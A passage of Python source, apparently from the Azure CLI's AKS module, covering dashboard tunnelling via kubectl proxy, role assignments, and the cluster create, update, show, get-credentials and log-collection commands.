logger.warning('Kubernetes resources view on %s', dashboardURL)
if not disable_browser:
webbrowser.open_new_tab(dashboardURL)
return
# otherwise open the kube-dashboard addon
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
_, browse_path = tempfile.mkstemp()
aks_get_credentials(cmd, client, resource_group_name, name, admin=False, path=browse_path)
# find the dashboard pod's name
try:
dashboard_pod = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--output", "name", "--selector", "k8s-app=kubernetes-dashboard"],
universal_newlines=True)
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard pod: {}'.format(err))
if dashboard_pod:
# remove any "pods/" or "pod/" prefix from the name
dashboard_pod = str(dashboard_pod).split('/')[-1].strip()
else:
raise CLIError("Couldn't find the Kubernetes dashboard pod.")
# find the port
try:
dashboard_port = subprocess.check_output(
["kubectl", "get", "pods", "--kubeconfig", browse_path, "--namespace", "kube-system",
"--selector", "k8s-app=kubernetes-dashboard",
"--output", "jsonpath='{.items[0].spec.containers[0].ports[0].containerPort}'"]
)
# output format: b"'{port}'"
dashboard_port = int((dashboard_port.decode('utf-8').replace("'", "")))
except subprocess.CalledProcessError as err:
raise CLIError('Could not find dashboard port: {}'.format(err))
# use https if dashboard container is using https
if dashboard_port == 8443:
protocol = 'https'
else:
protocol = 'http'
proxy_url = 'http://{0}:{1}/'.format(listen_address, listen_port)
dashboardURL = '{0}/api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(proxy_url,
protocol)
# launch kubectl port-forward locally to access the remote dashboard
if in_cloud_console():
# TODO: better error handling here.
response = requests.post('http://localhost:8888/openport/{0}'.format(listen_port))
result = json.loads(response.text)
dashboardURL = '{0}api/v1/namespaces/kube-system/services/{1}:kubernetes-dashboard:/proxy/'.format(
result['url'], protocol)
term_id = os.environ.get('ACC_TERM_ID')
if term_id:
response = requests.post('http://localhost:8888/openLink/{0}'.format(term_id),
json={"url": dashboardURL})
logger.warning('To view the console, please open %s in a new tab', dashboardURL)
else:
logger.warning('Proxy running on %s', proxy_url)
logger.warning('Press CTRL+C to close the tunnel...')
if not disable_browser:
wait_then_open_async(dashboardURL)
try:
try:
subprocess.check_output(["kubectl", "--kubeconfig", browse_path, "proxy", "--address",
listen_address, "--port", listen_port], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as err:
if err.output.find(b'unknown flag: --address'):
if listen_address != '127.0.0.1':
logger.warning('"--address" is only supported in kubectl v1.13 and later.')
logger.warning('The "--listen-address" argument will be ignored.')
subprocess.call(["kubectl", "--kubeconfig", browse_path, "proxy", "--port", listen_port])
except KeyboardInterrupt:
# Let command processing finish gracefully after the user presses [Ctrl+C]
pass
finally:
if in_cloud_console():
requests.post('http://localhost:8888/closeport/8001')
def _trim_nodepoolname(nodepool_name):
if not nodepool_name:
return "nodepool1"
return nodepool_name[:12]
def _add_monitoring_role_assignment(result, cluster_resource_id, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
logger.info('valid service principal exists, using it')
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_MONITORING_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME], 'identity')) and
(hasattr(result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity, 'object_id'))
):
logger.info('omsagent MSI exists, using it')
service_principal_msi_id = result.addon_profiles[CONST_MONITORING_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
if not _add_role_assignment(cmd.cli_ctx, 'Monitoring Metrics Publisher',
service_principal_msi_id, is_service_principal, scope=cluster_resource_id):
logger.warning('Could not create a role assignment for Monitoring addon. '
'Are you an Owner on this subscription?')
else:
logger.warning('Could not find service principal or user assigned MSI for role'
'assignment')
def _add_ingress_appgw_addon_role_assignment(result, cmd):
service_principal_msi_id = None
# Check if service principal exists, if it does, assign permissions to service principal
# Else, provide permissions to MSI
if (
hasattr(result, 'service_principal_profile') and
hasattr(result.service_principal_profile, 'client_id') and
result.service_principal_profile.client_id != 'msi'
):
service_principal_msi_id = result.service_principal_profile.client_id
is_service_principal = True
elif (
(hasattr(result, 'addon_profiles')) and
(CONST_INGRESS_APPGW_ADDON_NAME in result.addon_profiles) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME], 'identity')) and
(hasattr(result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity, 'object_id'))
):
service_principal_msi_id = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].identity.object_id
is_service_principal = False
if service_principal_msi_id is not None:
config = result.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].config
from msrestazure.tools import parse_resource_id, resource_id
if CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID in config:
appgw_id = config[CONST_INGRESS_APPGW_APPLICATION_GATEWAY_ID]
parsed_appgw_id = parse_resource_id(appgw_id)
appgw_group_id = resource_id(subscription=parsed_appgw_id["subscription"],
resource_group=parsed_appgw_id["resource_group"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=appgw_group_id):
logger.warning('Could not create a role assignment for application gateway: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', appgw_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_ID in config:
subnet_id = config[CONST_INGRESS_APPGW_SUBNET_ID]
if not _add_role_assignment(cmd.cli_ctx, 'Network Contributor',
service_principal_msi_id, is_service_principal, scope=subnet_id):
logger.warning('Could not create a role assignment for subnet: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', subnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
if CONST_INGRESS_APPGW_SUBNET_CIDR in config:
if result.agent_pool_profiles[0].vnet_subnet_id is not None:
parsed_subnet_vnet_id = parse_resource_id(result.agent_pool_profiles[0].vnet_subnet_id)
vnet_id = resource_id(subscription=parsed_subnet_vnet_id["subscription"],
resource_group=parsed_subnet_vnet_id["resource_group"],
namespace="Microsoft.Network",
type="virtualNetworks",
name=parsed_subnet_vnet_id["name"])
if not _add_role_assignment(cmd.cli_ctx, 'Contributor',
service_principal_msi_id, is_service_principal, scope=vnet_id):
logger.warning('Could not create a role assignment for virtual network: %s '
'specified in %s addon. '
'Are you an Owner on this subscription?', vnet_id, CONST_INGRESS_APPGW_ADDON_NAME)
def aks_create(cmd, # pylint: disable=too-many-locals,too-many-statements,too-many-branches
client,
resource_group_name,
name,
ssh_key_value,
dns_name_prefix=None,
location=None,
admin_username="azureuser",
windows_admin_username=None,
windows_admin_password=None,
enable_ahub=False,
kubernetes_version='',
node_vm_size="Standard_DS2_v2",
node_osdisk_type=None,
node_osdisk_size=0,
node_osdisk_diskencryptionset_id=None,
node_count=3,
nodepool_name="nodepool1",
nodepool_tags=None,
nodepool_labels=None,
service_principal=None, client_secret=None,
no_ssh_key=False,
disable_rbac=None,
enable_rbac=None,
enable_vmss=None,
vm_set_type=None,
skip_subnet_role_assignment=False,
enable_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
network_plugin=None,
network_policy=None,
pod_cidr=None,
service_cidr=None,
dns_service_ip=None,
docker_bridge_address=None,
load_balancer_sku=None,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
outbound_type=None,
enable_addons=None,
workspace_resource_id=None,
min_count=None,
max_count=None,
vnet_subnet_id=None,
pod_subnet_id=None,
ppg=None,
max_pods=0,
aad_client_app_id=None,
aad_server_app_id=None,
aad_server_app_secret=None,
aad_tenant_id=None,
tags=None,
node_zones=None,
enable_node_public_ip=False,
generate_ssh_keys=False, # pylint: disable=unused-argument
enable_pod_security_policy=False,
node_resource_group=None,
uptime_sla=False,
attach_acr=None,
enable_private_cluster=False,
private_dns_zone=None,
enable_managed_identity=False,
api_server_authorized_ip_ranges=None,
aks_custom_headers=None,
appgw_name=None,
appgw_subnet_prefix=None,
appgw_subnet_cidr=None,
appgw_id=None,
appgw_subnet_id=None,
appgw_watch_namespace=None,
enable_aad=False,
enable_azure_rbac=False,
aad_admin_group_object_ids=None,
disable_sgxquotehelper=False,
kubelet_config=None,
linux_os_config=None,
assign_identity=None,
auto_upgrade_channel=None,
enable_pod_identity=False,
no_wait=False):
if not no_ssh_key:
try:
if not ssh_key_value or not is_valid_ssh_rsa_public_key(ssh_key_value):
raise ValueError()
except (TypeError, ValueError):
shortened_key = truncate_text(ssh_key_value)
raise CLIError('Provided ssh key ({}) is invalid or non-existent'.format(shortened_key))
subscription_id = get_subscription_id(cmd.cli_ctx)
if not dns_name_prefix:
dns_name_prefix = _get_default_dns_prefix(name, resource_group_name, subscription_id)
rg_location = _get_rg_location(cmd.cli_ctx, resource_group_name)
if location is None:
location = rg_location
# Flag to be removed, kept for back-compatibility only. Remove the below section
# when we deprecate the enable-vmss flag
if enable_vmss:
if vm_set_type and vm_set_type.lower() != "VirtualMachineScaleSets".lower():
raise CLIError('enable-vmss and provided vm_set_type ({}) are conflicting with each other'.
format(vm_set_type))
vm_set_type = "VirtualMachineScaleSets"
vm_set_type = _set_vm_set_type(vm_set_type, kubernetes_version)
load_balancer_sku = set_load_balancer_sku(load_balancer_sku, kubernetes_version)
if api_server_authorized_ip_ranges and load_balancer_sku == "basic":
raise CLIError('--api-server-authorized-ip-ranges can only be used with standard load balancer')
agent_pool_profile = ManagedClusterAgentPoolProfile(
name=_trim_nodepoolname(nodepool_name), # Must be 12 chars or less before ACS RP adds to it
tags=nodepool_tags,
node_labels=nodepool_labels,
count=int(node_count),
vm_size=node_vm_size,
os_type="Linux",
mode="System",
vnet_subnet_id=vnet_subnet_id,
pod_subnet_id=pod_subnet_id,
proximity_placement_group_id=ppg,
availability_zones=node_zones,
enable_node_public_ip=enable_node_public_ip,
max_pods=int(max_pods) if max_pods else None,
type=vm_set_type
)
if node_osdisk_size:
agent_pool_profile.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool_profile.os_disk_type = node_osdisk_type
_check_cluster_autoscaler_flag(enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool_profile)
if kubelet_config:
agent_pool_profile.kubelet_config = _get_kubelet_config(kubelet_config)
if linux_os_config:
agent_pool_profile.linux_os_config = _get_linux_os_config(linux_os_config)
linux_profile = None
# LinuxProfile is just used for SSH access to VMs, so omit it if --no-ssh-key was specified.
if not no_ssh_key:
ssh_config = ContainerServiceSshConfiguration(
public_keys=[ContainerServiceSshPublicKey(key_data=ssh_key_value)])
linux_profile = ContainerServiceLinuxProfile(admin_username=admin_username, ssh=ssh_config)
windows_profile = None
if windows_admin_username:
if windows_admin_password is None:
try:
windows_admin_password = prompt_pass(msg='windows-admin-password: ', confirm=True)
except NoTTYException:
raise CLIError('Please specify both username and password in non-interactive mode.')
windows_license_type = None
if enable_ahub:
windows_license_type = 'Windows_Server'
windows_profile = ManagedClusterWindowsProfile(
admin_username=windows_admin_username,
admin_password=windows_admin_password,
license_type=windows_license_type)
principal_obj = _ensure_aks_service_principal(cmd.cli_ctx,
service_principal=service_principal, client_secret=client_secret,
subscription_id=subscription_id, dns_name_prefix=dns_name_prefix,
location=location, name=name)
service_principal_profile = ManagedClusterServicePrincipalProfile(
client_id=principal_obj.get("service_principal"),
secret=principal_obj.get("client_secret"))
if attach_acr:
if enable_managed_identity:
if no_wait:
raise CLIError('When --attach-acr and --enable-managed-identity are both specified, '
'--no-wait is not allowed, please wait until the whole operation succeeds.')
else:
_ensure_aks_acr(cmd.cli_ctx,
client_id=service_principal_profile.client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if (vnet_subnet_id and not skip_subnet_role_assignment and
not subnet_role_assignment_exists(cmd.cli_ctx, vnet_subnet_id)):
scope = vnet_subnet_id
identity_client_id = service_principal_profile.client_id
if enable_managed_identity and assign_identity:
identity_client_id = _get_user_assigned_identity_client_id(cmd.cli_ctx, assign_identity)
if not _add_role_assignment(
cmd.cli_ctx,
'Network Contributor',
identity_client_id,
scope=scope):
logger.warning('Could not create a role assignment for subnet. '
'Are you an Owner on this subscription?')
load_balancer_profile = create_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
outbound_type = _set_outbound_type(outbound_type, network_plugin, load_balancer_sku, load_balancer_profile)
network_profile = None
if any([network_plugin,
pod_cidr,
service_cidr,
dns_service_ip,
docker_bridge_address,
network_policy]):
if not network_plugin:
raise CLIError('Please explicitly specify the network plugin type')
if pod_cidr and network_plugin == "azure":
raise CLIError('Please use kubenet as the network plugin type when pod_cidr is specified')
network_profile = ContainerServiceNetworkProfile(
network_plugin=network_plugin,
pod_cidr=pod_cidr,
service_cidr=service_cidr,
dns_service_ip=dns_service_ip,
docker_bridge_cidr=docker_bridge_address,
network_policy=network_policy,
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type
)
else:
if load_balancer_sku.lower() == "standard" or load_balancer_profile:
network_profile = ContainerServiceNetworkProfile(
network_plugin="kubenet",
load_balancer_sku=load_balancer_sku.lower(),
load_balancer_profile=load_balancer_profile,
outbound_type=outbound_type,
)
if load_balancer_sku.lower() == "basic":
network_profile = ContainerServiceNetworkProfile(
load_balancer_sku=load_balancer_sku.lower(),
)
addon_profiles = _handle_addons_args(
cmd,
enable_addons,
subscription_id,
resource_group_name,
{},
workspace_resource_id,
appgw_name,
appgw_subnet_prefix,
appgw_subnet_cidr,
appgw_id,
appgw_subnet_id,
appgw_watch_namespace,
disable_sgxquotehelper
)
monitoring = False
if CONST_MONITORING_ADDON_NAME in addon_profiles:
monitoring = True
_ensure_container_insights_for_monitoring(cmd, addon_profiles[CONST_MONITORING_ADDON_NAME])
# addon is in the list and is enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in addon_profiles and \
addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
aad_profile = None
if enable_aad:
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
raise CLIError('"--enable-aad" cannot be used together with '
'"--aad-client-app-id/--aad-server-app-id/--aad-server-app-secret"')
aad_profile = ManagedClusterAADProfile(
managed=True,
enable_azure_rbac=enable_azure_rbac,
admin_group_object_ids=_parse_comma_separated_list(aad_admin_group_object_ids),
tenant_id=aad_tenant_id
)
else:
if aad_admin_group_object_ids is not None:
raise CLIError('"--admin-aad-object-id" can only be used together with "--enable-aad"')
if enable_azure_rbac is True:
raise CLIError('"--enable-azure-rbac" can only be used together with "--enable-aad"')
if any([aad_client_app_id, aad_server_app_id, aad_server_app_secret]):
aad_profile = ManagedClusterAADProfile(
client_app_id=aad_client_app_id,
server_app_id=aad_server_app_id,
server_app_secret=aad_server_app_secret,
tenant_id=aad_tenant_id
)
# Check that both --disable-rbac and --enable-rbac weren't provided
if all([disable_rbac, enable_rbac]):
raise CLIError('specify either "--disable-rbac" or "--enable-rbac", not both.')
api_server_access_profile = None
if api_server_authorized_ip_ranges:
api_server_access_profile = _populate_api_server_access_profile(api_server_authorized_ip_ranges)
identity = None
if not enable_managed_identity and assign_identity:
raise CLIError('--assign-identity can only be specified when --enable-managed-identity is specified')
if enable_managed_identity and not assign_identity:
identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif enable_managed_identity and assign_identity:
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
pod_identity_profile = None
if enable_pod_identity:
if not enable_managed_identity:
raise CLIError('--enable-pod-identity can only be specified when --enable-managed-identity is specified')
pod_identity_profile = ManagedClusterPodIdentityProfile(enabled=True)
enable_rbac = True
if disable_rbac:
enable_rbac = False
auto_upgrade_profile = None
if auto_upgrade_channel is not None:
auto_upgrade_profile = ManagedClusterAutoUpgradeProfile(upgrade_channel=auto_upgrade_channel)
mc = ManagedCluster(
location=location, tags=tags,
dns_prefix=dns_name_prefix,
kubernetes_version=kubernetes_version,
enable_rbac=enable_rbac,
agent_pool_profiles=[agent_pool_profile],
linux_profile=linux_profile,
windows_profile=windows_profile,
service_principal_profile=service_principal_profile,
network_profile=network_profile,
addon_profiles=addon_profiles,
aad_profile=aad_profile,
auto_scaler_profile=cluster_autoscaler_profile,
enable_pod_security_policy=bool(enable_pod_security_policy),
identity=identity,
disk_encryption_set_id=node_osdisk_diskencryptionset_id,
api_server_access_profile=api_server_access_profile,
auto_upgrade_profile=auto_upgrade_profile,
pod_identity_profile=pod_identity_profile)
if node_resource_group:
mc.node_resource_group = node_resource_group
if enable_private_cluster:
if load_balancer_sku.lower() != "standard":
raise CLIError("Please use standard load balancer for private cluster")
mc.api_server_access_profile = ManagedClusterAPIServerAccessProfile(
enable_private_cluster=True
)
if private_dns_zone:
if not enable_private_cluster:
raise CLIError("Invalid private dns zone for public cluster. It should always be empty for public cluster")
# remove following check once we support custom private dns zone
if private_dns_zone not in (CONST_PRIVATE_DNS_ZONE_SYSTEM, CONST_PRIVATE_DNS_ZONE_NONE):
raise CLIError("Invalid private dns zone for private cluster. Only 'system' or 'none' mode is supported")
mc.api_server_access_profile.private_dns_zone = private_dns_zone
if uptime_sla:
mc.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
headers = get_aks_custom_headers(aks_custom_headers)
# Due to SPN replication latency, we do a few retries here
max_retry = 30
retry_exception = Exception(None)
for _ in range(0, max_retry):
try:
created_cluster = _put_managed_cluster_ensuring_permission(
cmd,
client,
subscription_id,
resource_group_name,
name,
mc,
monitoring,
ingress_appgw_addon_enabled,
enable_managed_identity,
attach_acr,
headers,
no_wait)
return created_cluster
except CloudError as ex:
retry_exception = ex
if 'not found in Active Directory tenant' in ex.message:
time.sleep(3)
else:
raise ex
raise retry_exception
def aks_update(cmd, # pylint: disable=too-many-statements,too-many-branches,too-many-locals
client,
resource_group_name,
name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
cluster_autoscaler_profile=None,
min_count=None, max_count=None, no_wait=False,
load_balancer_managed_outbound_ip_count=None,
load_balancer_outbound_ips=None,
load_balancer_outbound_ip_prefixes=None,
load_balancer_outbound_ports=None,
load_balancer_idle_timeout=None,
api_server_authorized_ip_ranges=None,
enable_pod_security_policy=False,
disable_pod_security_policy=False,
attach_acr=None,
detach_acr=None,
uptime_sla=False,
enable_aad=False,
aad_tenant_id=None,
aad_admin_group_object_ids=None,
enable_ahub=False,
disable_ahub=False,
aks_custom_headers=None,
auto_upgrade_channel=None,
enable_managed_identity=False,
assign_identity=None,
enable_pod_identity=False,
disable_pod_identity=False,
yes=False):
update_autoscaler = enable_cluster_autoscaler or disable_cluster_autoscaler or update_cluster_autoscaler
update_acr = attach_acr is not None or detach_acr is not None
update_pod_security = enable_pod_security_policy or disable_pod_security_policy
update_lb_profile = is_load_balancer_profile_provided(load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout)
update_aad_profile = not (aad_tenant_id is None and aad_admin_group_object_ids is None)
# pylint: disable=too-many-boolean-expressions
if not update_autoscaler and \
cluster_autoscaler_profile is None and \
not update_acr and \
not update_lb_profile \
and api_server_authorized_ip_ranges is None and \
not update_pod_security and \
not update_lb_profile and \
not uptime_sla and \
not enable_aad and \
not update_aad_profile and \
not enable_ahub and \
not disable_ahub and \
not auto_upgrade_channel and \
not enable_managed_identity and \
not assign_identity and \
not enable_pod_identity and \
not disable_pod_identity:
raise CLIError('Please specify "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--cluster-autoscaler-profile" or '
'"--enable-pod-security-policy" or '
'"--disable-pod-security-policy" or '
'"--api-server-authorized-ip-ranges" or '
'"--attach-acr" or '
'"--detach-acr" or '
'"--uptime-sla" or '
'"--load-balancer-managed-outbound-ip-count" or '
'"--load-balancer-outbound-ips" or '
'"--load-balancer-outbound-ip-prefixes" or '
'"--enable-aad" or '
'"--aad-tenant-id" or '
'"--aad-admin-group-object-ids" or '
'"--enable-ahub" or '
'"--disable-ahub" or '
'"--enable-managed-identity" or '
'"--enable-pod-identity" or '
'"--disable-pod-identity" or '
'"--auto-upgrade-channel"')
instance = client.get(resource_group_name, name)
if update_autoscaler and len(instance.agent_pool_profiles) > 1:
raise CLIError('There is more than one node pool in the cluster. Please use "az aks nodepool" command '
'to update per node pool auto scaler settings')
if min_count is None or max_count is None:
if enable_cluster_autoscaler or update_cluster_autoscaler:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError('value of min-count should be less than or equal to value of max-count.')
if enable_cluster_autoscaler:
if instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already enabled for this managed cluster.\n'
'Please run "az aks update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
instance.agent_pool_profiles[0].enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
raise CLIError('Cluster autoscaler is not enabled for this managed cluster.\n'
'Run "az aks update --enable-cluster-autoscaler" '
'to enable cluster with min-count and max-count.')
instance.agent_pool_profiles[0].min_count = int(min_count)
instance.agent_pool_profiles[0].max_count = int(max_count)
if disable_cluster_autoscaler:
if not instance.agent_pool_profiles[0].enable_auto_scaling:
logger.warning('Cluster autoscaler is already disabled for this managed cluster.')
return None
instance.agent_pool_profiles[0].enable_auto_scaling = False
instance.agent_pool_profiles[0].min_count = None
instance.agent_pool_profiles[0].max_count = None
# if intention is to clear profile
if cluster_autoscaler_profile == {}:
instance.auto_scaler_profile = {}
# else profile is provided, update instance profile if it exists
elif cluster_autoscaler_profile:
instance.auto_scaler_profile = _update_dict(instance.auto_scaler_profile.__dict__,
dict((key.replace("-", "_"), value)
for (key, value) in cluster_autoscaler_profile.items())) \
if instance.auto_scaler_profile else cluster_autoscaler_profile
if enable_pod_security_policy and disable_pod_security_policy:
raise CLIError('Cannot specify --enable-pod-security-policy and --disable-pod-security-policy '
'at the same time.')
if enable_pod_security_policy:
instance.enable_pod_security_policy = True
if disable_pod_security_policy:
instance.enable_pod_security_policy = False
if update_lb_profile:
instance.network_profile.load_balancer_profile = update_load_balancer_profile(
load_balancer_managed_outbound_ip_count,
load_balancer_outbound_ips,
load_balancer_outbound_ip_prefixes,
load_balancer_outbound_ports,
load_balancer_idle_timeout,
instance.network_profile.load_balancer_profile)
if attach_acr and detach_acr:
raise CLIError('Cannot specify "--attach-acr" and "--detach-acr" at the same time.')
if uptime_sla:
instance.sku = ManagedClusterSKU(
name="Basic",
tier="Paid"
)
subscription_id = get_subscription_id(cmd.cli_ctx)
client_id = ""
if _is_msi_cluster(instance):
if instance.identity_profile is None or instance.identity_profile["kubeletidentity"] is None:
raise CLIError('Unexpected error getting kubelet\'s identity for the cluster. '
'Please do not set --attach-acr or --detach-acr. '
'You can manually grant or revoke permission to the identity named '
'<ClUSTER_NAME>-agentpool in MC_ resource group to access ACR.')
client_id = instance.identity_profile["kubeletidentity"].client_id
else:
client_id = instance.service_principal_profile.client_id
if not client_id:
raise CLIError('Cannot get the AKS cluster\'s service principal.')
if attach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=attach_acr,
subscription_id=subscription_id)
if detach_acr:
_ensure_aks_acr(cmd.cli_ctx,
client_id=client_id,
acr_name_or_id=detach_acr,
subscription_id=subscription_id,
detach=True)
# empty string is valid as it disables ip whitelisting
if api_server_authorized_ip_ranges is not None:
instance.api_server_access_profile = \
_populate_api_server_access_profile(api_server_authorized_ip_ranges, instance)
if enable_aad:
if instance.aad_profile is not None and instance.aad_profile.managed:
raise CLIError('Cannot specify "--enable-aad" if managed AAD is already enabled')
instance.aad_profile = ManagedClusterAADProfile(
managed=True
)
if update_aad_profile:
if instance.aad_profile is None or not instance.aad_profile.managed:
raise CLIError('Cannot specify "--aad-tenant-id/--aad-admin-group-object-ids"'
' if managed AAD is not enabled')
if aad_tenant_id is not None:
instance.aad_profile.tenant_id = aad_tenant_id
if aad_admin_group_object_ids is not None:
instance.aad_profile.admin_group_object_ids = _parse_comma_separated_list(aad_admin_group_object_ids)
if enable_ahub and disable_ahub:
raise CLIError('Cannot specify "--enable-ahub" and "--disable-ahub" at the same time')
if enable_ahub:
instance.windows_profile.license_type = 'Windows_Server'
if disable_ahub:
instance.windows_profile.license_type = 'None'
if instance.auto_upgrade_profile is None:
instance.auto_upgrade_profile = ManagedClusterAutoUpgradeProfile()
if auto_upgrade_channel is not None:
instance.auto_upgrade_profile.upgrade_channel = auto_upgrade_channel
if not enable_managed_identity and assign_identity:
raise CLIError('--assign-identity can only be specified when --enable-managed-identity is specified')
current_identity_type = "spn"
if instance.identity is not None:
current_identity_type = instance.identity.type.casefold()
goal_identity_type = current_identity_type
if enable_managed_identity:
if not assign_identity:
goal_identity_type = "systemassigned"
else:
goal_identity_type = "userassigned"
if current_identity_type != goal_identity_type:
from knack.prompting import prompt_y_n
msg = ""
if current_identity_type == "spn":
msg = ('Your cluster is using service principal, and you are going to update the cluster to use {} managed identity.\n'
'After updating, your cluster\'s control plane and addon pods will switch to use managed identity, but kubelet '
'will KEEP USING SERVICE PRINCIPAL until you upgrade your agentpool.\n '
'Are you sure you want to perform this operation?').format(goal_identity_type)
else:
msg = ('Your cluster is already using {} managed identity, and you are going to update the cluster to use {} managed identity. \n'
'Are you sure you want to perform this operation?').format(current_identity_type, goal_identity_type)
if not yes and not prompt_y_n(msg, default="n"):
return None
if goal_identity_type == "systemassigned":
instance.identity = ManagedClusterIdentity(
type="SystemAssigned"
)
elif goal_identity_type == "userassigned":
user_assigned_identity = {
assign_identity: ManagedClusterIdentityUserAssignedIdentitiesValue()
}
instance.identity = ManagedClusterIdentity(
type="UserAssigned",
user_assigned_identities=user_assigned_identity
)
if enable_pod_identity:
_update_addon_pod_identity(instance, enable=True)
if disable_pod_identity:
_update_addon_pod_identity(instance, enable=False)
headers = get_aks_custom_headers(aks_custom_headers)
monitoring_addon_enabled = CONST_MONITORING_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_MONITORING_ADDON_NAME].enabled
ingress_appgw_addon_enabled = CONST_INGRESS_APPGW_ADDON_NAME in instance.addon_profiles and \
instance.addon_profiles[CONST_INGRESS_APPGW_ADDON_NAME].enabled
return _put_managed_cluster_ensuring_permission(cmd,
client,
subscription_id,
resource_group_name,
name,
instance,
monitoring_addon_enabled,
ingress_appgw_addon_enabled,
_is_msi_cluster(instance),
attach_acr,
headers,
no_wait)
def aks_show(cmd, client, resource_group_name, name): # pylint: disable=unused-argument
mc = client.get(resource_group_name, name)
return _remove_nulls([mc])[0]
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
This works around a quirk of the SDK for python behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def aks_get_credentials(cmd, # pylint: disable=unused-argument
client,
resource_group_name,
name,
admin=False,
user='clusterUser',
path=os.path.join(os.path.expanduser('~'), '.kube', 'config'),
overwrite_existing=False,
context_name=None):
credentialResults = None
if admin:
credentialResults = client.list_cluster_admin_credentials(resource_group_name, name)
else:
if user.lower() == 'clusteruser':
credentialResults = client.list_cluster_user_credentials(resource_group_name, name)
elif user.lower() == 'clustermonitoringuser':
credentialResults = client.list_cluster_monitoring_user_credentials(resource_group_name, name)
else:
raise CLIError("The user is invalid.")
if not credentialResults:
raise CLIError("No Kubernetes credentials found.")
try:
kubeconfig = credentialResults.kubeconfigs[0].value.decode(encoding='UTF-8')
_print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name)
except (IndexError, ValueError):
raise CLIError("Fail to find kubeconfig file.")
# pylint: disable=line-too-long
def aks_kollect(cmd, # pylint: disable=too-many-statements,too-many-locals
client,
resource_group_name,
name,
storage_account=None,
sas_token=None,
container_logs=None,
kube_objects=None,
node_logs=None):
colorama.init()
mc = client.get(resource_group_name, name)
if not which('kubectl'):
raise CLIError('Can not find kubectl executable in PATH')
storage_account_id = None
if storage_account is None:
print("No storage account specified. Try getting storage account from diagnostic settings")
storage_account_id = get_storage_account_from_diag_settings(cmd.cli_ctx, resource_group_name, name)
if storage_account_id is None:
raise CLIError("A storage account must be specified, since there isn't one in the diagnostic settings.")
from msrestazure.tools import is_valid_resource_id, parse_resource_id, resource_id
if storage_account_id is None:
if not is_valid_resource_id(storage_account):
